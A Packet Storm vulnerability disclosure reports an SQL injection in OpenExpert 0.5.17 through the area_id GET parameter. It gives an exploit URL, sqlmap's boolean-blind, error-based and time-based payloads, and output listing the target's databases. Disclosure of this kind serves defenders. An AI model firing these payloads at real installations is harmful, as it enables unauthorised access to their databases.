OpenExpert 0.5.17 SQL Injection

2017-01-18T00:00:00
ID PACKETSTORM:140558
Type packetstorm
Reporter Nassim Asrir
Modified 2017-01-18T00:00:00

Description

                                        
                                            `# Title : Openexpert 0.5.17 - Sql Injection  
  
# Author: Nassim Asrir  
  
# Author Company: Henceforth  
  
# Tested on: Winxp sp3 - win7  
  
# Vendor: https://sourceforge.net/projects/law-expert/  
  
# Download Software: https://sourceforge.net/projects/law-expert/files/  
  
#################################################  
  
## About The Product : ##  
  
OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.  
  
## Vulnerability : ##   
  
- Vulnerable Parametre : area_id  
  
- HTTP Method : GET  
  
- To exploit it : http://HOST/expert_wizard.php?area_id=1'  
  
- Sqlmap Output :   
  
Parameter: area_id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: area_id=1 AND 4961=4961  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: area_id=1 AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(8855=8855,1))),0x71626b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: area_id=1 AND SLEEP(5)  
---  
[15:35:38] [INFO] the back-end DBMS is MySQL  
web server operating system: Windows  
web application technology: Apache 2.4.23, PHP 5.6.26  
back-end DBMS: MySQL >= 5.0  
[15:35:38] [INFO] fetching database names  
[15:35:39] [INFO] the SQL query used returns 5 entries  
[15:35:39] [INFO] retrieved: information_schema  
[15:35:39] [INFO] retrieved: mysql  
[15:35:39] [INFO] retrieved: performance_schema  
[15:35:39] [INFO] retrieved: sys  
[15:35:39] [INFO] retrieved: test  
  
`